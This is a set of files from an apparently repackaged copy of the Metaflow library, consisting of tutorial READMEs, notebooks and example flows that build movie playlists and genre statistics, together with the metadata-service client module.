Returns the latest successful run of this flow.
Returns
-------
Run
Latest successful run of this flow
"""
for run in self:
if run.successful:
return run
def runs(self, *tags):
"""
Returns an iterator over all the runs in the flow.
An optional filter is available that allows you to filter on tags. The
runs returned if the filter is specified will contain all the tags
specified.
Parameters
----------
tags : string
Tags to match
Returns
-------
Iterator[Run]
Iterator over Run objects in this flow
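        Example:
            A minimal sketch (the flow name and tag are placeholders):
                from metaflow import Flow
                for run in Flow('PlayListFlow').runs('user:alice'):
                    print(run, run.finished)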
"""
        return self._filtered_children(*tags)
# Episode 01-playlist: Let's build you a movie playlist.
--
**This flow loads a movie metadata CSV file and builds a playlist for your
favorite movie genre. Everything in Metaflow is versioned, so you can run it
multiple times and view all the historical playlists with the Metaflow client
in a Notebook.**
--
#### Showcasing:
- Including external files with 'IncludeFile'.
- Basic Metaflow Parameters.
- Running workflow branches in parallel and joining results.
- Using the Metaflow client in a Notebook.
#### Before playing this episode:
1. ```python -m pip install notebook```
#### To play this episode:
1. ```cd metaflow-tutorials```
2. ```python 01-playlist/playlist.py show```
3. ```python 01-playlist/playlist.py run```
4. ```python 01-playlist/playlist.py run --genre comedy```
5. ```jupyter-notebook 01-playlist/playlist.ipynb```
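#### Peek at past playlists (optional):
A minimal sketch of what the notebook in step 5 does; the flow name and the
artifact names ('playlist', 'bonus') come from playlist.py in this episode:
```
from metaflow import Flow, get_metadata
print("Using metadata provider: %s" % get_metadata())
run = Flow('PlayListFlow').latest_successful_run
print("Playlist from run: %s" % str(run))
for pick, movie in enumerate(run.data.playlist, start=1):
    print("Pick %d: %s" % (pick, movie))
print("Bonus pick: %s" % str(run.data.bonus))
```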
from metaflow import FlowSpec, step, IncludeFile, Parameter
def script_path(filename):
"""
A convenience function to get the absolute path to a file in this
tutorial's directory. This allows the tutorial to be launched from any
directory.
"""
import os
filepath = os.path.join(os.path.dirname(__file__))
return os.path.join(filepath, filename)
class PlayListFlow(FlowSpec):
"""
A flow to help you build your favorite movie playlist.
The flow performs the following steps:
1) Ingests a CSV file containing metadata about movies.
2) Loads two of the columns from the CSV into python lists.
3) In parallel branches:
- A) Filters movies by the genre parameter.
- B) Choose a random movie from a different genre.
4) Displays the top entries from the playlist.
"""
movie_data = IncludeFile("movie_data",
help="The path to a movie metadata file.",
default=script_path('movies.csv'))
genre = Parameter('genre',
help="Filter movies for a particular genre.",
default='Sci-Fi')
recommendations = Parameter('recommendations',
help="The number of movies to recommend in "
"the playlist.",
default=5)
@step
def start(self):
"""
Parse the CSV file and load the values into a dictionary of lists.
"""
# For this example, we only need the movie title and the genres.
columns = ['movie_title', 'genres']
# Create a simple data frame as a dictionary of lists.
self.dataframe = dict((column, list()) \
for column in columns)
# Parse the CSV header.
lines = self.movie_data.split('\n')
header = lines[0].split(',')
idx = {column: header.index(column) for column in columns}
# Populate our dataframe from the lines of the CSV file.
for line in lines[1:]:
if not line:
continue
fields = line.rsplit(',', 4)
for column in columns:
self.dataframe[column].append(fields[idx[column]])
# Compute genre specific movies and a bonus movie in parallel.
self.next(self.bonus_movie, self.genre_movies)
@step
def bonus_movie(self):
"""
This step chooses a random movie from a different genre.
"""
from random import choice
# Find all the movies that are not in the provided genre.
movies = [(movie, genres) \
for movie, genres \
in zip(self.dataframe['movie_title'],
self.dataframe['genres']) \
if self.genre.lower() not in genres.lower()]
# Choose one randomly.
self.bonus = choice(movies)
self.next(self.join)
@step
def genre_movies(self):
"""
Filter the movies by genre.
"""
from random import shuffle
# Find all the movies titles in the specified genre.
self.movies = [movie \
for movie, genres \
in zip(self.dataframe['movie_title'],
self.dataframe['genres']) \
if self.genre.lower() in genres.lower()]
# Randomize the title names.
shuffle(self.movies)
self.next(self.join)
@step
def join(self, inputs):
"""
Join our parallel branches and merge results.
"""
# Reassign relevant variables from our branches.
self.playlist = inputs.genre_movies.movies
self.bonus = inputs.bonus_movie.bonus
self.next(self.end)
@step
def end(self):
"""
Print out the playlist and bonus movie.
"""
print("Playlist for movies in genre '%s'" % self.genre)
for pick, movie in enumerate(self.playlist, start=1):
print("Pick %d: '%s'" % (pick, movie))
if pick >= self.recommendations:
break
print("Bonus Pick: '%s' from '%s'" % (self.bonus[0], self.bonus[1]))
if __name__ == '__main__':
    PlayListFlow()
# Episode 05-helloaws: Look Mom, We're in the Cloud
### In HelloAWSFlow, the 'start' and 'end' steps were run locally, while the 'hello' step was run remotely on AWS batch. Since we are using AWS, data artifacts and metadata were stored remotely. This means you can use the client to access information about any flow from anywhere. This notebook shows you how.
## Import the metaflow client
```
from metaflow import Flow, get_metadata
print("Current metadata provider: %s" % get_metadata())
```
## Print the message generated from the flow
```
run = Flow('HelloAWSFlow').latest_successful_run
print("Using run: %s" % str(run))
print(run.data.message)
```
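## Check where the 'hello' step ran (optional)
An illustrative extra cell; it reuses the same run object and the Task client API to look at the task behind the 'hello' step, which this episode runs on AWS batch:
```
task = run['hello'].task
print("The 'hello' step ran on: %s" % task.runtime_name)
print(task.stdout)
```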
# Episode 05-helloaws: Look Mom, We're in the Cloud.
--
**This flow is a simple linear workflow that verifies your AWS
configuration. The 'start' and 'end' steps will run locally, while the 'hello'
step will run remotely on AWS batch. After configuring Metaflow to run on AWS,
data and metadata about your runs will be stored remotely. This means you can
use the client to access information about any flow from anywhere.**
--
#### Showcasing:
- AWS batch decorator.
- Accessing data artifacts generated remotely in a local notebook.
- retry decorator.
#### Before playing this episode:
1. Configure your sandbox: https://docs.metaflow.org/metaflow-on-aws/metaflow-sandbox
2. ```python -m pip install notebook```
#### To play this episode:
1. ```cd metaflow-tutorials```
2. ```python 05-helloaws/helloaws.py run```
3. ```jupyter-notebook 05-helloaws/helloaws.ipynb```
4. Open 'helloaws.ipynb' in your remote Sagemaker notebook
# Episode 04-playlist-plus: The Final Showdown.
--
**Now that we've improved our genre based playlist generator, expose a 'hint'
parameter allowing the user to suggest a better bonus movie. The bonus movie is
chosen from the movie that has the most similiar name to the 'hint'.
This is achieved by importing a string edit distance package using Metaflow's
conda based dependency management feature. Dependency management builds
isolated and reproducible environments for individual steps.**
--
#### Showcasing:
- Metaflow's conda based dependency management.
#### Before playing this episode:
This tutorial requires the 'conda' package manager to be installed with the
conda-forge channel added.
1. Download Miniconda at 'https://docs.conda.io/en/latest/miniconda.html'
2. ```conda config --add channels conda-forge```
#### To play this episode:
1. ```cd metaflow-tutorials```
2. ```python 04-playlist-plus/playlist.py --environment=conda show```
3. ```python 04-playlist-plus/playlist.py --environment=conda run```
4. ```python 04-playlist-plus/playlist.py --environment=conda run --hint "Data Science Strikes Back"``` | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/04-playlist-plus/README.md | README.md |
from metaflow import FlowSpec, step, IncludeFile, Parameter, conda, conda_base
def get_python_version():
"""
A convenience function to get the python version used to run this
tutorial. This ensures that the conda environment is created with an
available version of python.
"""
import platform
versions = {'2' : '2.7.15',
'3' : '3.7.3'}
return versions[platform.python_version_tuple()[0]]
# Use the specified version of python for this flow.
@conda_base(python=get_python_version())
class PlayListFlow(FlowSpec):
"""
The next version of our playlist generator that adds a 'hint' parameter to
choose a bonus movie closest to the 'hint'.
The flow performs the following steps:
1) Load the genre specific statistics from the MovieStatsFlow.
2) In parallel branches:
- A) Build a playlist from the top films in the requested genre.
- B) Choose a bonus movie that has the closest string edit distance to
the user supplied hint.
3) Join the two to create a movie playlist and display it.
"""
genre = Parameter('genre',
help="Filter movies for a particular genre.",
default='Sci-Fi')
hint = Parameter('hint',
help="Give a hint to the bonus movie algorithm.",
default='Metaflow Release')
recommendations = Parameter('recommendations',
help="The number of movies recommended for "
"the playlist.",
default=5)
@conda(libraries={'pandas' : '0.24.2'})
@step
def start(self):
"""
Use the Metaflow client to retrieve the latest successful run from our
MovieStatsFlow and assign its results as data artifacts in this flow.
This step uses 'conda' to isolate the environment. This step will
always use pandas==0.24.2 regardless of what is installed on the
system.
"""
# Load the analysis from the MovieStatsFlow.
from metaflow import Flow, get_metadata
# Print metadata provider
print("Using metadata provider: %s" % get_metadata())
# Load the analysis from the MovieStatsFlow.
run = Flow('MovieStatsFlow').latest_successful_run
print("Using analysis from '%s'" % str(run))
# Get the dataframe from the start step before we sliced it into
# genre specific dataframes.
self.dataframe = run['start'].task.data.dataframe
# Also grab the summary statistics.
self.genre_stats = run.data.genre_stats
# Compute our two recommendation types in parallel.
self.next(self.bonus_movie, self.genre_movies)
@conda(libraries={'editdistance': '0.5.3', 'pandas' : '0.24.2'})
@step
def bonus_movie(self):
"""
Use the user supplied 'hint' argument to choose a bonus movie that has
the closest string edit distance to the hint.
This step uses 'conda' to isolate the environment. Note that the
package 'editdistance' need not be installed in your python
environment.
"""
import pandas
import editdistance
# Define a helper function to compute the similarity between two
# strings.
def _edit_distance(movie_title):
return editdistance.eval(self.hint, movie_title)
# Compute the distance and take the argmin to find the closest title.
distance = self.dataframe['movie_title'].apply(_edit_distance)
index = distance.idxmin()
self.bonus = (self.dataframe['movie_title'].values[index],
self.dataframe['genres'].values[index])
self.next(self.join)
@conda(libraries={'pandas' : '0.24.2'})
@step
def genre_movies(self):
"""
Select the top performing movies from the user-specified genre.
This step uses 'conda' to isolate the environment. This step will
always use pandas==0.24.2 regardless of what is installed on the
system.
"""
import pandas
from random import shuffle
# For the genre of interest, generate a potential playlist using only
# the highest grossing box office titles (i.e. those in the top quartile).
genre = self.genre.lower()
if genre not in self.genre_stats:
self.movies = []
else:
df = self.genre_stats[genre]['dataframe']
quartiles = self.genre_stats[genre]['quartiles']
selector = df['gross'] >= quartiles[-1]
self.movies = list(df[selector]['movie_title'])
# Shuffle the content.
shuffle(self.movies)
self.next(self.join)
@step
def join(self, inputs):
"""
Join our parallel branches and merge results.
"""
self.playlist = inputs.genre_movies.movies
self.bonus = inputs.bonus_movie.bonus
self.next(self.end)
@step
def end(self):
"""
This step simply prints out the playlist.
"""
# Print the playlist.
print("Playlist for movies in genre '%s'" % self.genre)
for pick, movie in enumerate(self.playlist, start=1):
print("Pick %d: '%s'" % (pick, movie))
if pick >= self.recommendations:
break
print("Bonus Pick: '%s' from '%s'" % (self.bonus[0], self.bonus[1]))
if __name__ == '__main__':
PlayListFlow() | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/04-playlist-plus/playlist.py | playlist.py |
# Episode 07: Way up here.
### This notebook shows how you can see some basic information about all Metaflow flows that you've run.
## Import the metaflow client
```
from metaflow import Metaflow, Flow, get_metadata
print("Current metadata provider: %s" % get_metadata())
```
## List all flows with their latest completion time and status
```
for flow in Metaflow():
run = flow.latest_run
print("{:<15} Last run: {} Successful: {}".\
format(flow.id, run.finished_at, run.successful))
```
## Give some detailed information on HelloAWSFlow
```
import time
flow = Flow('HelloAWSFlow')
runs = list(flow.runs())
print("HelloAWSFlow:")
for run in runs:
print("Run id: {}, Successful: {}".format(run.id, run.successful))
print("Tags: {}\n".format(sorted(list(run.tags))))
```
| 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/07-worldview/worldview.ipynb | worldview.ipynb |
# Episode 07-worldview: Way up here.
--
**This episode shows how you can use a notebook to set up a simple dashboard to
monitor all of your Metaflow flows.**
--
#### Showcasing:
- The metaflow client API.
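For example, the core of the dashboard in worldview.ipynb is just a loop over the client objects (a minimal sketch of what the notebook does):
```
from metaflow import Metaflow

# List every flow known to the current metadata provider,
# together with the status of its most recent run.
for flow in Metaflow():
    run = flow.latest_run
    print("%-15s last run: %s successful: %s" % (flow.id, run.finished_at, run.successful))
```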
#### Before playing this episode:
1. Configure your sandbox: https://docs.metaflow.org/metaflow-on-aws/metaflow-sandbox
2. ```python -m pip install notebook```
#### To play this episode:
1. ```cd metaflow-tutorials```
2. ```jupyter-notebook 07-worldview/worldview.ipynb```
3. Open 'worldview.ipynb' in your remote Sagemaker notebook | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/07-worldview/README.md | README.md |
# Episode 06: Computing in the Cloud.
### In Episode 06 we re-ran MovieStatsFlow on AWS using remote storage, metadata, and compute. This notebook shows how you can access your artifacts from anywhere.
## Import the metaflow client
```
from metaflow import Flow, get_metadata
import matplotlib.pyplot as plt
print("Current metadata provider: %s" % get_metadata())
```
## Get the latest successful run of MovieStatsFlow
```
run = Flow('MovieStatsFlow').latest_successful_run
print("Using run: %s" % str(run))
```
## You can get all of your data artifacts from the remote datastore, even the 'movies.csv' input file. Let's print the last line of the file.
```
movies_csv = run.data.movie_data
lines = [line for line in movies_csv.split('\n') if line]
print("The best movie ever made:")
print(lines[-1])
```
## Get the genre specific movie statistics
```
genre_stats = run.data.genre_stats
```
## Create a bar plot of the median gross box office for the top-5 grossing genres
```
# Get median for each genre
data = [(genre, data['quartiles'][1]) \
for genre, data \
in genre_stats.items()]
# Sort and unpack into a list of labels, and medians
genre, median = zip(*[(genre, median)\
for genre, median\
in sorted(data, key=lambda pair: pair[1])])
# Create the bar plot
plt.bar(genre[-5:], median[-5:], align='center', alpha=0.5)
plt.ylabel("Gross Box office (US Dollars)")
plt.show()
```
| 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/06-statistics-redux/stats.ipynb | stats.ipynb |
# Episode 06-statistics-redux: Computing in the Cloud.
--
**This example revisits 'Episode 02-statistics: Is this Data Science?'. With
Metaflow, you don't need to make any code changes to scale up your flow by
running on remote compute. In this example we re-run the 'stats.py' workflow
adding the '--with batch' command line argument. This instructs Metaflow to run
all your steps on AWS batch without changing any code. You can control the
behavior with additional arguments, like '--max-workers'. For this example,
'max-workers' is used to limit the number of parallel genre specific statistics
computations.
You can then access the data artifacts (even the local CSV file) from anywhere
because the data is being stored in AWS S3.**
--
#### Showcasing:
- '--with batch' command line option
- '--max-workers' command line option
- Accessing data locally or remotely
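For example, mirroring the notebook above, the artifacts can be read from any machine with the client once they are stored in S3 (assuming a completed MovieStatsFlow run):
```
from metaflow import Flow

# Fetch the latest successful run and read its artifacts,
# regardless of where the steps actually executed.
run = Flow('MovieStatsFlow').latest_successful_run
genre_stats = run.data.genre_stats
print(sorted(genre_stats.keys()))
```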
#### Before playing this episode:
1. Configure your sandbox: https://docs.metaflow.org/metaflow-on-aws/metaflow-sandbox
2. ```python -m pip install pandas```
3. ```python -m pip install notebook```
4. ```python -m pip install matplotlib```
#### To play this episode:
1. ```cd metaflow-tutorials```
2. ```python 02-statistics/stats.py --with batch run --max-workers 4```
3. ```jupyter-notebook 06-statistics-redux/stats.ipynb```
4. Open 'stats.ipynb' in your remote Sagemaker notebook | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/06-statistics-redux/README.md | README.md |
from metaflow import FlowSpec, step, IncludeFile
def script_path(filename):
"""
A convenience function to get the absolute path to a file in this
tutorial's directory. This allows the tutorial to be launched from any
directory.
"""
import os
filepath = os.path.join(os.path.dirname(__file__))
return os.path.join(filepath, filename)
class MovieStatsFlow(FlowSpec):
"""
A flow to generate some statistics about the movie genres.
The flow performs the following steps:
1) Ingests a CSV into a Pandas Dataframe.
2) Fan-out over genre using Metaflow foreach.
3) Compute quartiles for each genre.
4) Save a dictionary of genre specific statistics.
"""
movie_data = IncludeFile("movie_data",
help="The path to a movie metadata file.",
default=script_path('movies.csv'))
@step
def start(self):
"""
The start step:
1) Loads the movie metadata into pandas dataframe.
2) Finds all the unique genres.
3) Launches parallel statistics computation for each genre.
"""
import pandas
from io import StringIO
# Load the data set into a pandas dataframe.
self.dataframe = pandas.read_csv(StringIO(self.movie_data))
# The column 'genres' has a list of genres for each movie. Let's get
# all the unique genres.
self.genres = {genre for genres \
in self.dataframe['genres'] \
for genre in genres.split('|')}
self.genres = list(self.genres)
# We want to compute some statistics for each genre. The 'foreach'
# keyword argument allows us to compute the statistics for each genre in
# parallel (i.e. a fan-out).
self.next(self.compute_statistics, foreach='genres')
@step
def compute_statistics(self):
"""
Compute statistics for a single genre.
"""
# The genre currently being processed is a class property called
# 'input'.
self.genre = self.input
print("Computing statistics for %s" % self.genre)
# Find all the movies that have this genre and build a dataframe with
# just those movies and just the columns of interest.
selector = self.dataframe['genres'].\
apply(lambda row: self.genre in row)
self.dataframe = self.dataframe[selector]
self.dataframe = self.dataframe[['movie_title', 'genres', 'gross']]
# Get some statistics on the gross box office for these titles.
points = [.25, .5, .75]
self.quartiles = self.dataframe['gross'].quantile(points).values
# Join the results from other genres.
self.next(self.join)
@step
def join(self, inputs):
"""
Join our parallel branches and merge results into a dictionary.
"""
# Merge results from the genre specific computations.
self.genre_stats = {inp.genre.lower(): \
{'quartiles': inp.quartiles,
'dataframe': inp.dataframe} \
for inp in inputs}
self.next(self.end)
@step
def end(self):
"""
End the flow.
"""
pass
if __name__ == '__main__':
MovieStatsFlow() | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/02-statistics/stats.py | stats.py |
# Episode 02: Is this Data Science?
### MovieStatsFlow loads the movie metadata CSV file into a Pandas Dataframe and computes some movie genre specific statistics. You can use this notebook and the Metaflow client to eyeball the results and make some simple plots.
## Import the metaflow client
```
from metaflow import Flow, get_metadata
import matplotlib.pyplot as plt
print("Current metadata provider: %s" % get_metadata())
```
## Get the movie statistics from the latest run of MovieStatsFlow
```
run = Flow('MovieStatsFlow').latest_successful_run
print("Using run: %s" % str(run))
genre_stats = run.data.genre_stats
```
## Create a bar plot of the median gross box office for the top-5 grossing genres
```
# Get median for each genre
data = [(genre, data['quartiles'][1]) \
for genre, data \
in genre_stats.items()]
# Sort and unpack into a list of labels, and medians
genre, median = zip(*[(genre, median)\
for genre, median\
in sorted(data, key=lambda pair: pair[1])])
# Create the bar plot
plt.bar(genre[-5:], median[-5:], align='center', alpha=0.5)
plt.ylabel("Gross Box office (US Dollars)")
plt.show()
```
| 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/02-statistics/stats.ipynb | stats.ipynb |
# Episode 02-statistics: Is this Data Science?
--
**Use metaflow to load the movie metadata CSV file into a Pandas Dataframe and
compute some movie genre specific statistics. These statistics are then used in
later examples to improve our playlist generator. You can optionally use the
Metaflow client to eyeball the results in a Notebook, and make some simple
plots using the Matplotlib library.**
--
#### Showcasing:
- Fan-out over a set of parameters using Metaflow foreach.
- Using external packages like Pandas.
- Plotting results in a Notebook.
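In condensed form, the foreach fan-out used in stats.py looks like this (a stripped-down sketch with a made-up flow name):
```
from metaflow import FlowSpec, step

class ForeachSketchFlow(FlowSpec):

    @step
    def start(self):
        self.genres = ['Sci-Fi', 'Comedy', 'Drama']
        # Fan out: run compute_statistics once per genre, in parallel.
        self.next(self.compute_statistics, foreach='genres')

    @step
    def compute_statistics(self):
        # Inside a foreach branch, the current item is exposed as self.input.
        self.genre = self.input
        self.next(self.join)

    @step
    def join(self, inputs):
        # The join step receives one input object per branch.
        self.genres_processed = [inp.genre for inp in inputs]
        self.next(self.end)

    @step
    def end(self):
        print(self.genres_processed)

if __name__ == '__main__':
    ForeachSketchFlow()
```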
#### Before playing this episode:
1. ```python -m pip install pandas```
2. ```python -m pip install notebook```
3. ```python -m pip install matplotlib```
#### To play this episode:
1. ```cd metaflow-tutorials```
2. ```python 02-statistics/stats.py show```
3. ```python 02-statistics/stats.py run```
4. ```jupyter-notebook 02-statistics/stats.ipynb```
| 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/02-statistics/README.md | README.md |
import os
import requests
import time
from metaflow.exception import MetaflowException
from metaflow.metaflow_config import METADATA_SERVICE_NUM_RETRIES, METADATA_SERVICE_HEADERS, \
METADATA_SERVICE_URL
from .metadata import MetadataProvider
class ServiceException(MetaflowException):
headline = 'Metaflow service error'
def __init__(self, msg, http_code=None, body=None):
self.http_code = None if http_code is None else int(http_code)
self.response = body
super(ServiceException, self).__init__(msg)
class ServiceMetadataProvider(MetadataProvider):
TYPE = 'service'
def __init__(self, environment, flow, event_logger, monitor):
super(ServiceMetadataProvider, self).__init__(environment, flow, event_logger, monitor)
@classmethod
def compute_info(cls, val):
v = val.rstrip('/')
try:
resp = requests.get(os.path.join(v, 'ping'), headers=METADATA_SERVICE_HEADERS)
resp.raise_for_status()
except: # noqa E722
raise ValueError('Metaflow service [%s] unreachable.' % v)
return v
@classmethod
def default_info(cls):
return METADATA_SERVICE_URL
def new_run_id(self, tags=[], sys_tags=[]):
return self._new_run(tags=tags, sys_tags=sys_tags)
def register_run_id(self, run_id, tags=[], sys_tags=[]):
pass
def new_task_id(self, run_id, step_name, tags=[], sys_tags=[]):
return self._new_task(run_id, step_name, tags=tags, sys_tags=sys_tags)
def register_task_id(self,
run_id,
step_name,
task_id,
tags=[],
sys_tags=[]):
self._register_code_package_metadata(run_id, step_name, task_id)
def get_runtime_environment(self, runtime_name):
return {}
def register_data_artifacts(self,
run_id,
step_name,
task_id,
attempt_id,
artifacts):
url = ServiceMetadataProvider._obj_path(self._flow_name, run_id, step_name, task_id)
url += '/artifact'
data = self._artifacts_to_json(run_id, step_name, task_id, attempt_id, artifacts)
self._request(self._monitor, url, data)
def register_metadata(self, run_id, step_name, task_id, metadata):
url = ServiceMetadataProvider._obj_path(self._flow_name, run_id, step_name, task_id)
url += '/metadata'
data = self._metadata_to_json(run_id, step_name, task_id, metadata)
self._request(self._monitor, url, data)
@classmethod
def _get_object_internal(cls, obj_type, obj_order, sub_type, sub_order, filters=None, *args):
# Special handling of self, artifact, and metadata
if sub_type == 'self':
url = ServiceMetadataProvider._obj_path(*args[:obj_order])
try:
return MetadataProvider._apply_filter([cls._request(None, url)], filters)[0]
except ServiceException as ex:
if ex.http_code == 404:
return None
raise
# For the other types, we locate all the objects we need to find and return them
if obj_type != 'root':
url = ServiceMetadataProvider._obj_path(*args[:obj_order])
else:
url = ''
if sub_type != 'metadata':
url += '/%ss' % sub_type
else:
url += '/metadata'
try:
return MetadataProvider._apply_filter(cls._request(None, url), filters)
except ServiceException as ex:
if ex.http_code == 404:
return None
raise
def _new_run(self, tags=[], sys_tags=[]):
# first ensure that the flow exists
self._get_or_create('flow')
run = self._get_or_create('run', tags=tags, sys_tags=sys_tags)
return str(run['run_number'])
def _new_task(self,
run_id,
step_name,
tags=[],
sys_tags=[]):
self._get_or_create('step', run_id, step_name)
task = self._get_or_create('task', run_id, step_name, tags=tags, sys_tags=sys_tags)
self._register_code_package_metadata(run_id, step_name, task['task_id'])
return task['task_id']
@staticmethod
def _obj_path(
flow_name, run_id=None, step_name=None, task_id=None, artifact_name=None):
object_path = '/flows/%s' % flow_name
if run_id:
object_path += '/runs/%s' % run_id
if step_name:
object_path += '/steps/%s' % step_name
if task_id:
object_path += '/tasks/%s' % task_id
if artifact_name:
object_path += '/artifacts/%s' % artifact_name
return object_path
@staticmethod
def _create_path(obj_type, flow_name, run_id=None, step_name=None):
create_path = '/flows/%s' % flow_name
if obj_type == 'flow':
return create_path
if obj_type == 'run':
return create_path + '/run'
create_path += '/runs/%s/steps/%s' % (run_id, step_name)
if obj_type == 'step':
return create_path + '/step'
return create_path + '/task'
def _get_or_create(
self, obj_type, run_id=None, step_name=None, task_id=None, tags=[], sys_tags=[]):
def create_object():
data = self._object_to_json(
obj_type,
run_id,
step_name,
task_id,
tags + self.sticky_tags,
sys_tags + self.sticky_sys_tags)
return self._request(self._monitor, create_path, data)
always_create = False
obj_path = self._obj_path(self._flow_name, run_id, step_name, task_id)
create_path = self._create_path(obj_type, self._flow_name, run_id, step_name)
if obj_type == 'run' and run_id is None:
always_create = True
elif obj_type == 'task' and task_id is None:
always_create = True
if always_create:
return create_object()
try:
return self._request(self._monitor, obj_path)
except ServiceException as ex:
if ex.http_code == 404:
return create_object()
else:
raise
@classmethod
def _request(cls, monitor, path, data=None):
if cls.INFO is None:
raise MetaflowException('Missing Metaflow Service URL. '
'Specify with METAFLOW_SERVICE_URL environment variable')
url = os.path.join(cls.INFO, path.lstrip('/'))
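        # Retry up to METADATA_SERVICE_NUM_RETRIES times with exponential backoff:
        # 503 responses and connection errors are retried, other HTTP errors raise immediately.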
for i in range(METADATA_SERVICE_NUM_RETRIES):
try:
if data is None:
if monitor:
with monitor.measure('metaflow.service_metadata.get'):
resp = requests.get(url, headers=METADATA_SERVICE_HEADERS)
else:
resp = requests.get(url, headers=METADATA_SERVICE_HEADERS)
else:
if monitor:
with monitor.measure('metaflow.service_metadata.post'):
resp = requests.post(url, headers=METADATA_SERVICE_HEADERS, json=data)
else:
resp = requests.post(url, headers=METADATA_SERVICE_HEADERS, json=data)
except: # noqa E722
if monitor:
with monitor.count('metaflow.service_metadata.failed_request'):
if i == METADATA_SERVICE_NUM_RETRIES - 1:
raise
else:
if i == METADATA_SERVICE_NUM_RETRIES - 1:
raise
resp = None
else:
if resp.status_code < 300:
return resp.json()
elif resp.status_code != 503:
raise ServiceException('Metadata request (%s) failed (code %s): %s'
% (path, resp.status_code, resp.text),
resp.status_code,
resp.text)
time.sleep(2**i)
if resp:
raise ServiceException('Metadata request (%s) failed (code %s): %s'
% (path, resp.status_code, resp.text),
resp.status_code,
resp.text)
else:
raise ServiceException('Metadata request (%s) failed' % path) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/metadata/service.py | service.py |